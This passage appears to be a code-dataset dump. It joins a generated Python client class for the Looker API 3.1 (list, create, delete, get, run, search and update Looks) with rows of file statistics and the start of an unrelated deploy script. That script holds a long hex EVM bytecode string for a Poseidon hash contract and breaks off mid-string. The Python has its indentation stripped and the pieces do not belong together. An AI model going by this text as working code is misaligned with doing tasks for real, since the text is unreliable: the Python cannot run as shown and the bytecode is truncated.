Create and run merged results queries * Create and modify dashboard filters * Create and modify password requirements ### Deprecated in API 3.0 The following functions and properties have been deprecated in API 3.0. They continue to exist and work in API 3.0 for the next several Looker releases but they have not been carried forward to API 3.1: * Dashboard Prefetch functions * User access_filter functions * User API 1.0 credentials functions * Space.is_root and Space.is_user_root properties. Use Space.is_shared_root and Space.is_users_root instead. ### Semantic changes in API 3.1: * `all_looks` no longer includes soft-deleted looks, matching `all_dashboards` behavior. You can find soft-deleted looks using `search_looks` with the `deleted` param set to True. * `all_spaces` no longer includes duplicate items * `search_users` no longer accepts Y,y,1,0,N,n for Boolean params, only \"true\" and \"false\". * For greater client and network compatibility, `render_task_results` now returns HTTP status ***202 Accepted*** instead of HTTP status ***102 Processing*** * `all_running_queries` and `kill_query` functions have moved into the `Query` function group. If you have application code which relies on the old behavior of the APIs above, you may continue using the API 3.0 functions in this Looker release. We strongly suggest you update your code to use API 3.1 analogs as soon as possible.
OpenAPI spec version: 3.1.0
Contact: support@looker.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class LookApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def all_looks(self, **kwargs):
"""
Get All Looks
### Get information about all active Looks Returns an array of **abbreviated Look objects** describing all the looks that the caller has access to. Soft-deleted Looks are **not** included. Get the **full details** of a specific look by id with [Look](#!/Look/look) Find **soft-deleted looks** with [Search Looks](#!/Looks/search_looks)
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.all_looks(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str fields: Requested fields.
:return: list[Look]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.all_looks_with_http_info(**kwargs)
else:
(data) = self.all_looks_with_http_info(**kwargs)
return data
def all_looks_with_http_info(self, **kwargs):
"""
Get All Looks
### Get information about all active Looks Returns an array of **abbreviated Look objects** describing all the looks that the caller has access to. Soft-deleted Looks are **not** included. Get the **full details** of a specific look by id with [Look](#!/Look/look) Find **soft-deleted looks** with [Search Looks](#!/Looks/search_looks)
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.all_looks_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str fields: Requested fields.
:return: list[Look]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method all_looks" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/looks'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'fields' in params:
query_params['fields'] = params['fields']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Look]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_look(self, **kwargs):
"""
Create Look
### Create a Look with specified information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_look(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param LookWithQuery body: Look
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_look_with_http_info(**kwargs)
else:
(data) = self.create_look_with_http_info(**kwargs)
return data
def create_look_with_http_info(self, **kwargs):
"""
Create Look
### Create a Look with specified information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_look_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param LookWithQuery body: Look
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'fields']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_look" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/looks'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'fields' in params:
query_params['fields'] = params['fields']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LookWithQuery',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_look(self, look_id, **kwargs):
"""
Delete Look
### Delete the look with a specific id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_look(look_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_look_with_http_info(look_id, **kwargs)
else:
(data) = self.delete_look_with_http_info(look_id, **kwargs)
return data
def delete_look_with_http_info(self, look_id, **kwargs):
"""
Delete Look
### Delete the look with a specific id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_look_with_http_info(look_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['look_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_look" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'look_id' is set
if ('look_id' not in params) or (params['look_id'] is None):
raise ValueError("Missing the required parameter `look_id` when calling `delete_look`")
collection_formats = {}
resource_path = '/looks/{look_id}'.replace('{format}', 'json')
path_params = {}
if 'look_id' in params:
path_params['look_id'] = params['look_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def look(self, look_id, **kwargs):
"""
Get Look
### Get a Look. Returns detailed information about a Look and its associated Query.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.look(look_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.look_with_http_info(look_id, **kwargs)
else:
(data) = self.look_with_http_info(look_id, **kwargs)
return data
def look_with_http_info(self, look_id, **kwargs):
"""
Get Look
### Get a Look. Returns detailed information about a Look and its associated Query.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.look_with_http_info(look_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['look_id', 'fields']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method look" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'look_id' is set
if ('look_id' not in params) or (params['look_id'] is None):
raise ValueError("Missing the required parameter `look_id` when calling `look`")
collection_formats = {}
resource_path = '/looks/{look_id}'.replace('{format}', 'json')
path_params = {}
if 'look_id' in params:
path_params['look_id'] = params['look_id']
query_params = {}
if 'fields' in params:
query_params['fields'] = params['fields']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LookWithQuery',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def run_look(self, look_id, result_format, **kwargs):
"""
Run Look
### Run a Look. Runs a given look's query and returns the results in the requested format. Supported formats: | result_format | Description | :-----------: | :--- | | json | Plain json | json_detail | Row data plus metadata describing the fields, pivots, table calcs, and other aspects of the query | csv | Comma separated values with a header | txt | Tab separated values with a header | html | Simple html | md | Simple markdown | xlsx | MS Excel spreadsheet | sql | Returns the generated SQL rather than running the query | png | A PNG image of the visualization of the query | jpg | A JPG image of the visualization of the query
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.run_look(look_id, result_format, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param str result_format: Format of result (required)
:param int limit: Row limit (may override the limit in the saved query).
:param bool apply_formatting: Apply model-specified formatting to each result.
:param bool apply_vis: Apply visualization options to results.
:param bool cache: Get results from cache if available.
:param int image_width: Render width for image formats.
:param int image_height: Render height for image formats.
:param bool generate_drill_links: Generate drill links (only applicable to 'json_detail' format.
:param bool force_production: Force use of production models even if the user is in development mode.
:param bool cache_only: Retrieve any results from cache even if the results have expired.
:param str path_prefix: Prefix to use for drill links (url encoded).
:param bool rebuild_pdts: Rebuild PDTS used in query.
:param bool server_table_calcs: Perform table calculations on query results
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.run_look_with_http_info(look_id, result_format, **kwargs)
else:
(data) = self.run_look_with_http_info(look_id, result_format, **kwargs)
return data
def run_look_with_http_info(self, look_id, result_format, **kwargs):
"""
Run Look
### Run a Look. Runs a given look's query and returns the results in the requested format. Supported formats: | result_format | Description | :-----------: | :--- | | json | Plain json | json_detail | Row data plus metadata describing the fields, pivots, table calcs, and other aspects of the query | csv | Comma separated values with a header | txt | Tab separated values with a header | html | Simple html | md | Simple markdown | xlsx | MS Excel spreadsheet | sql | Returns the generated SQL rather than running the query | png | A PNG image of the visualization of the query | jpg | A JPG image of the visualization of the query
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.run_look_with_http_info(look_id, result_format, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param str result_format: Format of result (required)
:param int limit: Row limit (may override the limit in the saved query).
:param bool apply_formatting: Apply model-specified formatting to each result.
:param bool apply_vis: Apply visualization options to results.
:param bool cache: Get results from cache if available.
:param int image_width: Render width for image formats.
:param int image_height: Render height for image formats.
:param bool generate_drill_links: Generate drill links (only applicable to 'json_detail' format.
:param bool force_production: Force use of production models even if the user is in development mode.
:param bool cache_only: Retrieve any results from cache even if the results have expired.
:param str path_prefix: Prefix to use for drill links (url encoded).
:param bool rebuild_pdts: Rebuild PDTS used in query.
:param bool server_table_calcs: Perform table calculations on query results
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['look_id', 'result_format', 'limit', 'apply_formatting', 'apply_vis', 'cache', 'image_width', 'image_height', 'generate_drill_links', 'force_production', 'cache_only', 'path_prefix', 'rebuild_pdts', 'server_table_calcs']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method run_look" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'look_id' is set
if ('look_id' not in params) or (params['look_id'] is None):
raise ValueError("Missing the required parameter `look_id` when calling `run_look`")
# verify the required parameter 'result_format' is set
if ('result_format' not in params) or (params['result_format'] is None):
raise ValueError("Missing the required parameter `result_format` when calling `run_look`")
collection_formats = {}
resource_path = '/looks/{look_id}/run/{result_format}'.replace('{format}', 'json')
path_params = {}
if 'look_id' in params:
path_params['look_id'] = params['look_id']
if 'result_format' in params:
path_params['result_format'] = params['result_format']
query_params = {}
if 'limit' in params:
query_params['limit'] = params['limit']
if 'apply_formatting' in params:
query_params['apply_formatting'] = params['apply_formatting']
if 'apply_vis' in params:
query_params['apply_vis'] = params['apply_vis']
if 'cache' in params:
query_params['cache'] = params['cache']
if 'image_width' in params:
query_params['image_width'] = params['image_width']
if 'image_height' in params:
query_params['image_height'] = params['image_height']
if 'generate_drill_links' in params:
query_params['generate_drill_links'] = params['generate_drill_links']
if 'force_production' in params:
query_params['force_production'] = params['force_production']
if 'cache_only' in params:
query_params['cache_only'] = params['cache_only']
if 'path_prefix' in params:
query_params['path_prefix'] = params['path_prefix']
if 'rebuild_pdts' in params:
query_params['rebuild_pdts'] = params['rebuild_pdts']
if 'server_table_calcs' in params:
query_params['server_table_calcs'] = params['server_table_calcs']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text', 'application/json', 'image/png', 'image/jpg'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_looks(self, **kwargs):
"""
Search Looks
### Search Looks Returns an **array of Look objects** that match the specified search criteria. If multiple search params are given and `filter_or` is FALSE or not specified, search params are combined in a logical AND operation. Only rows that match *all* search param criteria will be returned. If `filter_or` is TRUE, multiple search params are combined in a logical OR operation. Results will include rows that match **any** of the search criteria. String search params use case-insensitive matching. String search params can contain `%` and '_' as SQL LIKE pattern match wildcard expressions. example=\"dan%\" will match \"danger\" and \"Danzig\" but not \"David\" example=\"D_m%\" will match \"Damage\" and \"dump\" Integer search params can accept a single value or a comma separated list of values. The multiple values will be combined under a logical OR operation - results will match at least one of the given values. Most search params can accept \"IS NULL\" and \"NOT NULL\" as special expressions to match or exclude (respectively) rows where the column is null. Boolean search params accept only \"true\" and \"false\" as values. Get a **single look** by id with [Look](#!/Look/look)
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_looks(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str title: Match Look title.
:param str description: Match Look description.
:param int content_favorite_id: Select looks with a particular content favorite id
:param str space_id: Select looks in a particular space.
:param str user_id: Select looks created by a particular user.
:param str view_count: Select looks with particular view_count value
:param bool deleted: Select soft-deleted looks
:param int query_id: Select looks that reference a particular query by query_id
:param str fields: Requested fields.
:param int page: Requested page.
:param int per_page: Results per page.
:param int limit: Number of results to return. (used with offset and takes priority over page and per_page)
:param int offset: Number of results to skip before returning any. (used with limit and takes priority over page and per_page)
:param str sorts: One or more fields to sort results by. Sortable fields: [:title, :user_id, :id, :created_at, :space_id, :description, :updated_at, :last_updater_id, :view_count, :favorite_count, :content_favorite_id, :deleted, :deleted_at, :last_viewed_at, :query_id]
:param bool filter_or: Combine given search criteria in a boolean OR expression
:return: list[Look]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.search_looks_with_http_info(**kwargs)
else:
(data) = self.search_looks_with_http_info(**kwargs)
return data
def search_looks_with_http_info(self, **kwargs):
"""
Search Looks
### Search Looks Returns an **array of Look objects** that match the specified search criteria. If multiple search params are given and `filter_or` is FALSE or not specified, search params are combined in a logical AND operation. Only rows that match *all* search param criteria will be returned. If `filter_or` is TRUE, multiple search params are combined in a logical OR operation. Results will include rows that match **any** of the search criteria. String search params use case-insensitive matching. String search params can contain `%` and '_' as SQL LIKE pattern match wildcard expressions. example=\"dan%\" will match \"danger\" and \"Danzig\" but not \"David\" example=\"D_m%\" will match \"Damage\" and \"dump\" Integer search params can accept a single value or a comma separated list of values. The multiple values will be combined under a logical OR operation - results will match at least one of the given values. Most search params can accept \"IS NULL\" and \"NOT NULL\" as special expressions to match or exclude (respectively) rows where the column is null. Boolean search params accept only \"true\" and \"false\" as values. Get a **single look** by id with [Look](#!/Look/look)
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_looks_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str title: Match Look title.
:param str description: Match Look description.
:param int content_favorite_id: Select looks with a particular content favorite id
:param str space_id: Select looks in a particular space.
:param str user_id: Select looks created by a particular user.
:param str view_count: Select looks with particular view_count value
:param bool deleted: Select soft-deleted looks
:param int query_id: Select looks that reference a particular query by query_id
:param str fields: Requested fields.
:param int page: Requested page.
:param int per_page: Results per page.
:param int limit: Number of results to return. (used with offset and takes priority over page and per_page)
:param int offset: Number of results to skip before returning any. (used with limit and takes priority over page and per_page)
:param str sorts: One or more fields to sort results by. Sortable fields: [:title, :user_id, :id, :created_at, :space_id, :description, :updated_at, :last_updater_id, :view_count, :favorite_count, :content_favorite_id, :deleted, :deleted_at, :last_viewed_at, :query_id]
:param bool filter_or: Combine given search criteria in a boolean OR expression
:return: list[Look]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['title', 'description', 'content_favorite_id', 'space_id', 'user_id', 'view_count', 'deleted', 'query_id', 'fields', 'page', 'per_page', 'limit', 'offset', 'sorts', 'filter_or']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_looks" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/looks/search'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'title' in params:
query_params['title'] = params['title']
if 'description' in params:
query_params['description'] = params['description']
if 'content_favorite_id' in params:
query_params['content_favorite_id'] = params['content_favorite_id']
if 'space_id' in params:
query_params['space_id'] = params['space_id']
if 'user_id' in params:
query_params['user_id'] = params['user_id']
if 'view_count' in params:
query_params['view_count'] = params['view_count']
if 'deleted' in params:
query_params['deleted'] = params['deleted']
if 'query_id' in params:
query_params['query_id'] = params['query_id']
if 'fields' in params:
query_params['fields'] = params['fields']
if 'page' in params:
query_params['page'] = params['page']
if 'per_page' in params:
query_params['per_page'] = params['per_page']
if 'limit' in params:
query_params['limit'] = params['limit']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'sorts' in params:
query_params['sorts'] = params['sorts']
if 'filter_or' in params:
query_params['filter_or'] = params['filter_or']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Look]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_look(self, look_id, body, **kwargs):
"""
Update Look
### Update the Look with a specific id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_look(look_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param LookWithQuery body: Look (required)
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_look_with_http_info(look_id, body, **kwargs)
else:
(data) = self.update_look_with_http_info(look_id, body, **kwargs)
return data
def update_look_with_http_info(self, look_id, body, **kwargs):
"""
Update Look
### Update the Look with a specific id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_look_with_http_info(look_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int look_id: Id of look (required)
:param LookWithQuery body: Look (required)
:param str fields: Requested fields.
:return: LookWithQuery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['look_id', 'body', 'fields']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_look" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'look_id' is set
if ('look_id' not in params) or (params['look_id'] is None):
raise ValueError("Missing the required parameter `look_id` when calling `update_look`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_look`")
collection_formats = {}
resource_path = '/looks/{look_id}'.replace('{format}', 'json')
path_params = {}
if 'look_id' in params:
path_params['look_id'] = params['look_id']
query_params = {}
if 'fields' in params:
query_params['fields'] = params['fields']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LookWithQuery',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 52.278509 | 4,190 | 0.609715 | 5,550 | 47,678 | 5.061622 | 0.093333 | 0.039869 | 0.024811 | 0.020967 | 0.812509 | 0.793571 | 0.787876 | 0.780507 | 0.767336 | 0.76488 | 0 | 0.001334 | 0.308276 | 47,678 | 911 | 4,191 | 52.335895 | 0.850455 | 0.468098 | 0 | 0.713647 | 0 | 0 | 0.17746 | 0.021805 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033557 | false | 0 | 0.01566 | 0 | 0.098434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f31afa9790963d440ad0a9e1c581ad1df5497ac1 | 25,814 | py | Python | scripts/deploy/poseidon.py | apguerrera/Daisy | eecb6c86385425bba3e07d67b77f99d75598194e | [
"MIT"
] | 1 | 2021-01-16T03:31:56.000Z | 2021-01-16T03:31:56.000Z | scripts/deploy/poseidon.py | apguerrera/Daisy | eecb6c86385425bba3e07d67b77f99d75598194e | [
"MIT"
] | 2 | 2021-05-11T18:58:52.000Z | 2021-09-02T13:18:22.000Z | scripts/deploy/poseidon.py | apguerrera/Daisy | eecb6c86385425bba3e07d67b77f99d75598194e | [
"MIT"
] | 1 | 2020-07-04T05:45:38.000Z | 2020-07-04T05:45:38.000Z | poseidon_3_data="0x38600c6000396113e16000f37c01000000000000000000000000000000000000000000000000000000006000350463c4420fb4146200002e57fe5b7f1c1a3768e9260dc884c9d0f0bdf2d9ea705f7ab10dfdc93e724e68d3e7e7e0766020527f19f4488073beed9fabc0b17b18ce89d2a381bb6a0a749aa45264a0fd28f197dd6040527f0b0107540b5b6dbb0fd0b7fc29e8152dbc7bd2627f0540fe5f9f0450e2af525c6060527f293286a76478862032b0c359b7cec1f99c9a9ac8d403d6858f0380e74e2926966080527f254d625156408e15c9f1f133a8d4854fcdca57d43131621d6c083628f3bae69e60a0527f003d169b99acee11f4597812bb47dfb33ca83e8af3588036d62675e2dd68f72160c0527f183de36980a18ec7bea8626e0bcb931647ade2e34a8fe901990a7782d0c9f5d660e0527f2929981a77de426cb111973cc0c0f019ae65e7f3cdb3b6b6ee213e1fbf969160611000527f1e0f7ebe237a76c518864e0d4f9d26e5f368670fe39e1d9f6ef5a22fd4be760b611200527f30644e72e131a029b85045b68181585d2833e84879b9709143e1f593f00000016084356064356044357f1fd4a35e68f0946f8f5dfd2ac9d7882ce2466ec1c9766f69b5a14c3f84a17be284818308915084818408925084818508935050838181808280098009099050838281808280098009099150838381808280098009099250620002036000526200138c565b7f170118300987f2aa8128c6893a7691621b7dd210af7f412385f8d6663782490884818308915084818408925084818508935050838181808280098009099050838281808280098009099150838381808280098009099250620002686000526200138c565b7f0b734ac64dd2198297d67aab5b9f2dd61ae0a5e169692c8802760c97c1b7b0ed84818308915084818408925084818508935050838181808280098009099050838281808280098009099150838381808280098009099250620002cd6000526200138c565b7f1430e42a7b4242b4586f06e9885a444ea4920fac92e2dfbc3cc16ebc2bc3416784818308915084818408925084818508935050838181808280098009099050838281808280098009099150838381808280098009099250620003326000526200138c565b7f2d03cefd44927bbfa58fb8a8f22a0686c99db6ea9673e5ae2e3f51016b4d7812848183089150848184089250848185089350508381818082800980090990506200037f6000526200138c565b7f27a60ef60d51be502cad8248a0f6ddc28f49ce9e174032bb1a054503691a99b384818308915084818408925084818508935050838181808280098009099050620003cc6000526200138c565b7f080a061bb2bc9ebb8c05ecf71fc842c7a09a85d48f5147fdd3bafc8d63a6180184818308915084818408925084818508935050838181808280098009099050620004196000526200138c565b7f0470cb196b0b31dcf0f998c08fd4a2d3784c84625d3d23cd9959c8df3d61a85084818308915084818408925084818508935050838181808280098009099050620004666000526200138c565b7f236a18fd797bcde8ceefd41745367450d80ecaf8fa5da304af8dd07d6c9c4a2f84818308915084818408925084818508935050838181808280098009099050620004b36000526200138c565b7f2da94346d74ec77c4e5f937d2d595070636e2fcdb9349ce0e2c789c9e9d41ae784818308915084818408925084818508935050838181808280098009099050620005006000526200138c565b7f278c16574216dd6780c4233d2e8bc1f90a76442f4fed1678d91a38f26a169f1d848183089150848184089250848185089350508381818082800980090990506200054d6000526200138c565b7f0aba88ce0a5f3f57c82b73cc72d86f0182a5ebbf61236cf2d67e3903428f105c848183089150848184089250848185089350508381818082800980090990506200059a6000526200138c565b7f13d45f17ebd7bd267612d1c7d028c3ef2380ee77838b1809039156e45ea399da84818308915084818408925084818508935050838181808280098009099050620005e76000526200138c565b7f2d7a5202c14dd920b8382ce02653223d81eeeba9e2a27473af50810482e01dd784818308915084818408925084818508935050838181808280098009099050620006346000526200138c565b7f2